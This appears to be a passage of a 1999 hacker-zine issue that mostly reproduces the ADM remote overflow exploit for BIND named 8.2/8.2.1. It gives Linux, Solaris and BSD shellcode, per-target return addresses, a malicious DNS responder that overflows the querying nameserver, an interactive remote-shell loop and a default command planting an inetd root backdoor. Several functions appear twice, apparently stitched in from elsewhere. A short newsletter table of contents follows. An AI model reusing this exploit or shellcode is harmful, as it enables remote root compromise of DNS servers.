dnsh->ancount = htons(1);
dnsh->arcount = htons(1);
dnsh->rcode = 0;
walker=(char*)(dnsh+1);
p=dnssprintflabel(query, (char *)packet, (char*)(packet+1));
query[strlen(query) - 1] = 0;
qtype=*((unsigned short *)p);
printf("%s type=%d\n",query, ntohs(qtype));
/* first, the query */
walker=dnsaddlabel(walker, query);
PUTSHORT(ntohs(qtype), walker);
//PUTSHORT(htons(T_PTR), walker);
PUTSHORT(1,walker);
/* then, our answer */
/* query IN A 1.2.3.4 */
walker=dnsaddlabel(walker, query);
PUTSHORT(T_A, walker);
PUTSHORT(1, walker);
PUTLONG(60*5, walker);
PUTSHORT(4, walker);
sprintf(walker,"%c%c%c%c",1,2,3,4);
walker+=4;
/* finally, we make named do something more interesting */
walker=dnsaddlabel(walker, query);
PUTSHORT(T_NXT, walker);
PUTSHORT(1, walker);
PUTLONG(60*5, walker);
/* the length of one label and our arbitrary data */
PUTSHORT(archlist[arch].length+7, walker);
PUTSHORT(6, walker);
sprintf(walker,"admadm");
walker+=6;
PUTSHORT(0, walker);
make_overflow(walker);
walker+=archlist[arch].length;
PUTSHORT(0, walker);
return walker-buf;
}
#define max(x,y) ((x)>(y)?(x):(y))
int proxyloop(int s)
{
char snd[1024], rcv[1024];
fd_set rset;
int maxfd, n;
sleep(1);
printf("Entering proxyloop..\n");
strcpy(snd, "cd /; uname -a; pwd; id;\n");
write(s, snd, strlen(snd));
for (;;)
{
FD_SET(fileno(stdin), &rset);
FD_SET(s, &rset);
maxfd = max(fileno(stdin), s) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if (FD_ISSET(fileno(stdin), &rset))
{
bzero(snd, sizeof(snd));
fgets(snd, sizeof(snd) - 2, stdin);
write(s, snd, strlen(snd));
}
if (FD_ISSET(s, &rset))
{
bzero(rcv, sizeof(rcv));
if ((n = read(s, rcv, sizeof(rcv))) == 0)
exit(0);
if (n < 0)
{
return -3;
}
fputs(rcv, stdout);
}
}
return 0;
}
int main(int argc, char **argv)
{
int s, fromlen, res, sl, s2;
struct sockaddr_in sa, from, to;
char buf[16384];
char sendbuf[16384];
unsigned short ts;
int i;
if (argc<2)
{
fprintf(stderr,"Usage: %s architecture [command]\n", argv[0]);
fprintf(stderr,"Available architectures:\n");
i=-1;
while(archlist[++i].id)
fprintf(stderr," %d: %s\n",archlist[i].id,archlist[i].name);
exit(1);
}
arch=atoi(argv[1])-1;
if (argc==3)
command=argv[2];
if ((s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))==-1)
{
perror("socket");
exit(1);
}
bzero(&sa, sizeof sa);
sa.sin_family=AF_INET;
sa.sin_addr.s_addr=INADDR_ANY;
sa.sin_port=htons(53);
if (bind(s, (struct sockaddr *)&sa, sizeof(sa))==-1)
{
perror("bind");
exit(1);
}
do
{
fromlen=sizeof(from);
if ((res=recvfrom(s, buf, sizeof buf, 0, (struct sockaddr *)&from,
&fromlen)) == -1)
{
perror("recvfrom");
exit(1);
}
printf("Received request from %s:%d for ", inet_ntoa(from.sin_addr),
ntohs(from.sin_port));
sl=form_response((HEADER *)buf,sendbuf);
/* now lets connect to the nameserver */
bzero(&to, sizeof(to));
to.sin_family=AF_INET;
to.sin_addr=from.sin_addr;
to.sin_port=htons(53);
if ((s2=socket(AF_INET, SOCK_STREAM, 0))==-1)
{
perror("socket");
exit(1);
}
if (connect(s2, (struct sockaddr *)&to, sizeof to)==-1)
{
perror("connect");
exit(1);
}
ts=htons(sl);
write(s2,&ts,2);
write(s2,sendbuf,sl);
if (archlist[arch].safe>1)
close(s2);
} while (archlist[arch].safe>1); /* infinite loop for sparc */
proxyloop(s2);
exit(1);
}
/*
* ADM CONFIDENTIAL -- (ADM Confidential Restricted when
* combined with the aggregated modules for this product)
* OBJECT CODE ONLY SOURCE MATERIALS
* (C) COPYRIGHT ADM Crew. 1999
* All Rights Reserved
*
* This module may not be used, published, distributed or archived without
* the written permission of the ADM Crew. Please contact your local sales
* representative.
*
* ADM named 8.2/8.2.1 NXT remote overflow - horizon/plaguez
*
* "a misanthropic anthropoid with nothing to say"
*
* thanks to stran9er for sdnsofw.c
*
* Intel exploitation is pretty straightforward.. should give you a remote
* shell. The shellcode will break chroot, do a getpeername on all open
* sockets, and dup to the first one that returns AFINET. It also forks and
* runs a command in case the fd duping doesn't go well. Solaris/SPARC is a
* bit more complicated.. we are going through a well trodden part of the
* code, so we don't get the context switch we need to have it populate the
* register windows from the stack. However, if you just hammer the service
* with requests, you will quickly get a context switch at the right time.
* Thus, the SPARC shellcode currently only breaks chroot, closes current
* fd's and runs a command.
* Also, the NetBSD shellcode doesn't break chroot because they stop the
* dir tricks. Of course, they allow mknods in chrooted environments, so
* if named is running as root, then it still might be expoitable.
* The non-exec stack patch version returns into a malloc'ed buffer, whose
* address can vary quite alot. Thus, it may not be as reliable as the other
* versions..
*
* We broke this just a little in order to raise the bar on using it
* (just slightly).. If you'd like to test it on your own box, put a shell
* in /adm/sh, or /adm/ksh for solaris on the target machine.
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>
char linuxcode[]=
{0xe9,0xac,0x1,0x0,0x0,0x5e,0x89,0x76,0xc,0x8d,0x46,0x8,0x89,0x46,0x10,0x8d,
0x46,0x2e,0x89,0x46,0x14,0x56,0xeb,0x54,0x5e,0x89,0xf3,0xb9,0x0,0x0,0x0,0x0,
0xba,0x0,0x0,0x0,0x0,0xb8,0x5,0x0,0x0,0x0,0xcd,0x80,0x50,0x8d,0x5e,0x2,0xb9,
0xff,0x1,0x0,0x0,0xb8,0x27,0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0x2,0xb8,0x3d,0x0,
0x0,0x0,0xcd,0x80,0x5b,0x53,0xb8,0x85,0x0,0x0,0x0,0xcd,0x80,0x5b,0xb8,0x6,
0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0xb,0xb8,0xc,0x0,0x0,0x0,0xcd,0x80,0x89,0xf3,
0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0xeb,0x2c,0xe8,0xa7,0xff,0xff,0xff,0x2e,0x0,
0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x5e,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x89,
0xc0,0x85,0xc0,0xf,0x85,0x8e,0x0,0x0,0x0,0x89,0xf3,0x8d,0x4e,0xc,0x8d,0x56,
0x18,0xb8,0xb,0x0,0x0,0x0,0xcd,0x80,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80,0xe8,0x75,
0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74,0x68,0x69,0x73,0x69,0x73,
0x73,0x6f,0x6d,0x65,0x74,0x65,0x6d,0x70,0x73,0x70,0x61,0x63,0x65,0x66,0x6f,
0x72,0x74,0x68,0x65,0x73,0x6f,0x63,0x6b,0x69,0x6e,0x61,0x64,0x64,0x72,0x69,
0x6e,0x79,0x65,0x61,0x68,0x79,0x65,0x61,0x68,0x69,0x6b,0x6e,0x6f,0x77,0x74,
0x68,0x69,0x73,0x69,0x73,0x6c,0x61,0x6d,0x65,0x62,0x75,0x74,0x61,0x6e,0x79,
0x77,0x61,0x79,0x77,0x68,0x6f,0x63,0x61,0x72,0x65,0x73,0x68,0x6f,0x72,0x69,
0x7a,0x6f,0x6e,0x67,0x6f,0x74,0x69,0x74,0x77,0x6f,0x72,0x6b,0x69,0x6e,0x67,
0x73,0x6f,0x61,0x6c,0x6c,0x69,0x73,0x63,0x6f,0x6f,0x6c,0xeb,0x86,0x5e,0x56,
0x8d,0x46,0x8,0x50,0x8b,0x46,0x4,0x50,0xff,0x46,0x4,0x89,0xe1,0xbb,0x7,0x0,
0x0,0x0,0xb8,0x66,0x0,0x0,0x0,0xcd,0x80,0x83,0xc4,0xc,0x89,0xc0,0x85,0xc0,
0x75,0xda,0x66,0x83,0x7e,0x8,0x2,0x75,0xd3,0x8b,0x56,0x4,0x4a,0x52,0x89,0xd3,
0xb9,0x0,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3,
0xb9,0x1,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3,
0xb9,0x2,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0xeb,0x12,0x5e,0x46,
0x46,0x46,0x46,0x46,0xc7,0x46,0x10,0x0,0x0,0x0,0x0,0xe9,0xfe,0xfe,0xff,0xff,
0xe8,0xe9,0xff,0xff,0xff,0xe8,0x4f,0xfe,0xff,0xff,0x2f,0x61,0x64,0x6d,0x2f,
0x73,0x68,0x0,0x2d,0x63,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a,0x5b,
0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x2d};
char sc[]=
{0x40,0x0,0x0,0x2e,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xd5,0x92,0x10,0x20,0x0,
0x82,0x10,0x20,0x5,0x91,0xd0,0x20,0x0,0xa0,0x10,0x0,0x8,0x90,0x3,0xe0,0xcc,
0x92,0x10,0x21,0xff,0x82,0x10,0x20,0x50,0x91,0xd0,0x20,0x0,0x90,0x3,0xe0,
0xcc,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10,
0x20,0x78,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0,
0x20,0x0,0x90,0x3,0xe0,0xd7,0x82,0x10,0x20,0xc,0x91,0xd0,0x20,0x0,0x90,0x3,
0xe0,0xd5,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0xa0,0x10,0x20,0x0,0x90,
0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0,0x20,0x0,0xa0,0x4,0x20,0x1,0x80,
0xa4,0x20,0x1e,0x4,0xbf,0xff,0xfb,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xc0,0xa0,
0x3,0xe0,0xc5,0xe0,0x23,0xbf,0xf0,0xa0,0x3,0xe0,0xc9,0xe0,0x23,0xbf,0xf4,
0xa0,0x3,0xe1,0x5,0xe0,0x23,0xbf,0xf8,0xc0,0x23,0xbf,0xfc,0x92,0x3,0xbf,0xf0,
0x94,0x3,0xbf,0xfc,0x82,0x10,0x20,0x3b,0x91,0xd0,0x20,0x0,0x81,0xc3,0xe0,0x8,
0x1,0x0,0x0,0x0,0x2f,0x61,0x64,0x6d,0x2f,0x6b,0x73,0x68,0x0,0x2d,0x63,0x0,
0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x0,0x2e,0x2e,0x2f,0x2e,
0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,
0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x68,0x6f,0x72,0x69,0x7a,0x6f,
0x6e,0x5b,0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x0};
char bsdcode[]=
{0xe9,0xd4,0x1,0x0,0x0,0x5e,0x31,0xc0,0x50,0x50,0xb0,0x17,0xcd,0x80,0x31,0xc0,
0x50,0x50,0x56,0x50,0xb0,0x5,0xcd,0x80,0x89,0x46,0x28,0xb9,0xff,0x1,0x0,0x0,
0x51,0x8d,0x46,0x2,0x50,0x50,0xb8,0x88,0x0,0x0,0x0,0xcd,0x80,0x8d,0x46,0x2,
0x50,0x50,0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0x8b,0x46,0x28,0x50,0x50,0xb8,0xa7,
0x0,0x0,0x0,0x34,0
xaa,0xcd,0x80,0x8d,0x46,0xb,0x50,0x50,0xb8,0xa6,0x0,0x0,
0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0x21,0x48,0x50,0x50,0xb8,0x3d,0x0,0x0,0x0,
0xcd,0x80,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf,0x85,0xe6,0x0,
0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46,0x2c,0x8d,
0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50,0x52,0x50,
0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80,
0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x62,0x6c,0x61,0x68,
0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67,0x79,0x65,
0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65,0x66,0x6f,
0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72,0x75,0x63,
0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69,0x6d,0x65,
0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c,0x6c,0x63,
0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79,0x74,0x68,
0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f,0x70,0x65,
0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67,0x68,0x73,
0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a,
0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61,0x70,0x70,
0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d,0x20,0x31,
0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x8d,0x46,0x4,0x50,
0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x83,0xf8,
0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6,0x0,0x0,0x0,0xcd,
0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,
0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2,0x52,0x52,0xb8,0x5a,
0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46,0x46,0x8d,0x56,0x38,
0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46,0x34,0x50,0x8d,0x46,
0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9,0xc1,0xfe,0xff,0xff,
0xe8,0xd2,0xff,0xff,0xff,0xe8,0x27,0xfe,0xff,0xff,0x2e,0x0,0x41,0x44,0x4d,
0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,
0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0xff,0x0,0x0,0x0,0x0,0x2f,0x61,0x64,0x6d,0x2f,0x73,0x68,0x0,0x2d,0x63,0x0,
0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x59,0x4f,0x59,0x4f,
0x59,0x4f,0x0};
char bsdnochroot[]=
{0xe9,0x79,0x1,0x0,0x0,0x5e,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf,
0x85,0xe6,0x0,0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46,
0x2c,0x8d,0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50,
0x52,0x50,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0,
0xcd,0x80,0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0x0,0x0,0x0,0x62,0x6c,
0x61,0x68,0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67,
0x79,0x65,0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65,
0x66,0x6f,0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72,
0x75,0x63,0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69,
0x6d,0x65,0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c,
0x6c,0x63,0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79,
0x74,0x68,0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f,
0x70,0x65,0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67,
0x68,0x73,0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75,
0x65,0x7a,0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61,
0x70,0x70,0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d,
0x20,0x31,0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x5e,0x8d,
0x46,0x4,0x50,0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80,
0x5a,0x83,0xf8,0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6,
0x0,0x0,0x0,0xcd,0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0,
0x0,0xcd,0x80,0x6a,0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2,
0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46,
0x46,0x8d,0x56,0x38,0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46,
0x34,0x50,0x8d,0x46,0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9,
0xc0,0xfe,0xff,0xff,0xe8,0xd2,0xff,0xff,0xff,0xe8,0x82,0xfe,0xff,0xff,0x2e,
0x0,0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,
0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,
0x2f,0x2e,0x2e,0x2f,0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0xff,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x2f,0x61,0x64,0x6d,0x2f,0x73,0x68,
0x0,0x2d,0x63,0x0,0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f,
0x59,0x4f,0x59,0x4f,0x59,0x4f,0x0};
struct arch
{
int id;
char *name;
char *code;
int codesize;
unsigned long safe;
unsigned long ret;
int length;
};
struct arch archlist[] =
{
{1, "Linux Redhat 6.x - named 8.2/8.2.1 (from rpm)", linuxcode,
sizeof(linuxcode), 0, 0xbfffd6c3, 6500},
{2, "Linux SolarDiz's non-exec stack patch - named 8.2/8.2.1",linuxcode,
sizeof(linuxcode), 0, 0x80f79ae, 6500},
{3, "Solaris 7 (0xff) - named 8.2.1", sc, sizeof(sc), 0xffbea738,
0xffbedbd0, 11000},
{4, "Solaris 2.6 - named 8.2.1", sc, sizeof(sc), 0xefffa000,
0xefffe5d0, 11000},
{5, "FreeBSD 3.2-RELEASE - named 8.2", bsdcode, sizeof(bsdcode), 1,
0xbfbfbdb8, 7000},
{6, "OpenBSD 2.5 - named 8.2", bsdcode, sizeof(bsdcode), 1,
0xefbfbb00, 7000},
{7, "NetBSD 1.4.1 - named 8.2.1", bsdnochroot, sizeof(bsdnochroot), 1,
0xefbfbb00, 7000},
{0, 0, 0, 0}
};
int arch=0;
char *command=0;
/* these two dns routines from dspoof/jizz */
/* pull out a compressed query name */
char *dnssprintflabel(char *s, char *buf, char *p)
{
unsigned short i,len;
char *b=NULL;
len=(unsigned short)*(p++);
while (len) {
while (len >= 0xC0) {
if (!b)
b=p+1;
p=buf+(ntohs(*((unsigned short *)(p-1))) & ~0xC000);
len=(unsigned short)*(p++);
}
for (i=0;i<len;i++)
*(s++)=*(p++);
*(s++)='.';
len=(unsigned short)*(p++);
}
*(s++)=0;
if (b)
return(b);
return(p);
}
/* store a query name */
char *dnsaddlabel(char *p, char *label)
{
char *p1;
while ((*label) && (label)) {
if ((*label == '.') && (!*(label+1)))
break;
p1=strchr(label,'.');
if (!p1)
p1=strchr(label,0);
*(p++)=p1-label;
memcpy(p,label,p1-label);
p+=p1-label;
label=p1;
if (*p1)
label++;
}
*(p++)=0;
return(p);
}
void make_overflow(char *a)
{
int i;
unsigned long *b;
unsigned char *c;
char sbuf[4096];
if (archlist[arch].safe==0) /* linux */
{
memset(a,0x90,4134);
memcpy(a+3500,archlist[arch].code,archlist[arch].codesize);
if (command)
strcpy(a+3500+archlist[arch].codesize, command);
else
strcpy(a+3500+archlist[arch].codesize, "exit");
b=(unsigned long*)(a+4134);
for (i=0;i<20;i++)
*b++=archlist[arch].ret;
}
else if (archlist[arch].safe==1) /* bsd */
{
memset(a,0x90,4134);
memcpy(a+3300,archlist[arch].code,archlist[arch].codesize);
if (command)
strcpy(a+3300+archlist[arch].codesize, command);
else
strcpy(a+3300+archlist[arch].codesize, "exit");
b=(unsigned long*)(a+4134);
for (i=0;i<20;i++)
*b++=archlist[arch].ret;
}
else /*SPARC*/
{
memset(a,0x0,11000);
b=(unsigned long*)(a+4438);
for (i=0;i<1500;i++)
*b++=htonl(0xac15a16e);
c=(char *)b;
for (i=0;i<archlist[arch].codesize;i++)
*c++=archlist[arch].code[i];
if (command)
strcpy(c, command);
else
strcpy(c, "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" \
>>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob;/bin/rm -f /tmp/bob ");
b=(unsigned long*)(a+4166);
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //i2 - significant
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //i5 - significant
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //o0 - significant
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //o2 - significant
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //o6 - significant
*b++=htonl(archlist[arch].ret); //o7 - retaddr
}
}
int form_response(HEADER *packet, char *buf)
{
char query[512];
int qtype;
HEADER *dnsh;
char *p;
char *walker;
memset(buf,0,sizeof(buf));
dnsh = (HEADER *) buf;
dnsh->id = packet->id;
dnsh->qr=1;
dnsh->aa=1;
dnsh->qdcount = htons(1);
dnsh->ancount = htons(1);
dnsh->arcount = htons(1);
dnsh->rcode = 0;
walker=(char*)(dnsh+1);
p=dnssprintflabel(query, (char *)packet, (char*)(packet+1));
query[strlen(query) - 1] = 0;
qtype=*((unsigned short *)p);
printf("%s type=%d\n",query, ntohs(qtype));
/* first, the query */
walker=dnsaddlabel(walker, query);
PUTSHORT(ntohs(qtype), walker);
//PUTSHORT(htons(T_PTR), walker);
PUTSHORT(1,walker);
/* then, our answer */
/* query IN A 1.2.3.4 */
walker=dnsaddlabel(walker, query);
PUTSHORT(T_A, walker);
PUTSHORT(1, walker);
PUTLONG(60*5, walker);
PUTSHORT(4, walker);
sprintf(walker,"%c%c%c%c",1,2,3,4);
walker+=4;
/* finally, we make named do something more interesting */
walker=dnsaddlabel(walker, query);
PUTSHORT(T_NXT, walker);
PUTSHORT(1, walker);
PUTLONG(60*5, walker);
/* the length of one label and our arbitrary data */
PUTSHORT(archlist[arch].length+7, walker);
PUTSHORT(6, walker);
sprintf(walker,"admadm");
walker+=6;
PUTSHORT(0, walker);
make_overflow(walker);
walker+=archlist[arch].length;
PUTSHORT(0, walker);
return walker-buf;
}
#define max(x,y) ((x)>(y)?(x):(y))
int proxyloop(int s)
{
char snd[1024], rcv[1024];
fd_set rset;
int maxfd, n;
sleep(1);
printf("Entering proxyloop..\n");
strcpy(snd, "cd /; uname -a; pwd; id;\n");
write(s, snd, strlen(snd));
for (;;)
{
FD_SET(fileno(stdin), &rset);
FD_SET(s, &rset);
maxfd = max(fileno(stdin), s) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if (FD_ISSET(fileno(stdin), &rset))
{
bzero(snd, sizeof(snd));
fgets(snd, sizeof(snd) - 2, stdin);
write(s, snd, strlen(snd));
}
if (FD_ISSET(s, &rset))
{
bzero(rcv, sizeof(rcv));
if ((n = read(s, rcv, sizeof(rcv))) == 0)
exit(0);
if (n < 0)
{
return -3;
}
fputs(rcv, stdout);
}
}
return 0;
}
int main(int argc, char **argv)
{
int s, fromlen, res, sl, s2;
struct sockaddr_in sa, from, to;
char buf[16384];
char sendbuf[16384];
unsigned short ts;
int i;
if (argc<2)
{
fprintf(stderr,"Usage: %s architecture [command]\n", argv[0]);
fprintf(stderr,"Available architectures:\n");
i=-1;
while(archlist[++i].id)
fprintf(stderr," %d: %s\n",archlist[i].id,archlist[i].name);
exit(1);
}
arch=atoi(argv[1])-1;
if (argc==3)
command=argv[2];
if ((s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))==-1)
{
perror("socket");
exit(1);
}
bzero(&sa, sizeof sa);
sa.sin_family=AF_INET;
sa.sin_addr.s_addr=INADDR_ANY;
sa.sin_port=htons(53);
if (bind(s, (struct sockaddr *)&sa, sizeof(sa))==-1)
{
perror("bind");
exit(1);
}
do
{
fromlen=sizeof(from);
if ((res=recvfrom(s, buf, sizeof buf, 0, (struct sockaddr *)&from,
&fromlen)) == -1)
{
perror("recvfrom");
exit(1);
}
printf("Received request from %s:%d for ", inet_ntoa(from.sin_addr),
ntohs(from.sin_port));
sl=form_response((HEADER *)buf,sendbuf);
/* now lets connect to the nameserver */
bzero(&to, sizeof(to));
to.sin_family=AF_INET;
to.sin_addr=from.sin_addr;
to.sin_port=htons(53);
if ((s2=socket(AF_INET, SOCK_STREAM, 0))==-1)
{
perror("socket");
exit(1);
}
if (connect(s2, (struct sockaddr *)&to, sizeof to)==-1)
{
perror("connect");
exit(1);
}
ts=htons(sl);
write(s2,&ts,2);
write(s2,sendbuf,sl);
if (archlist[arch].safe>1)
close(s2);
} while (archlist[arch].safe>1); /* infinite loop for sparc */
proxyloop(s2);
exit(1);
}
@HWA
53.0 Security Focus Newsletter #13
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security Focus Newsletter #13
Table of Contents:
I. INTRODUCTION
II. BUGTRAQ SUMMARY
1. Pacific Software URL Live! Directory Traversal Vulnerability
2. Squid Web Proxy Authentication Failure Vulnerability
3. Zeus Webserver Possible Remote root Compromise
4. Falcon Web Server Directory Traversal Vulnerability
5. AIX Filtering Vulnerability
6. MacOS 9 Console Lock Bypass Vulnerability
7. WFTPD Remote Buffer Overflow Vulnerability
8. Netscape Messaging Server RCPT TO DoS Vulnerability
9. Celtech ExpressFS USER Buffer Overflow Vulnerability
10. NT Services Denial of Service
11. FreeBSD Amanda 'amandad' Symlink Vulnerability
12. Multiple Vendor Linux NIS Vulnerabilities
13. aVirt Mail Server Buffer Overflow
III. PATCH UPDATES
1. Vulnerability Patched: Zeus Webserver Possible Remote root Compromise
2. Vulnerability Patched: Squid Web Proxy Authentication Failure
3. Vulnerability Patched: Falcon Web Server Directory Traversal Vulnerability
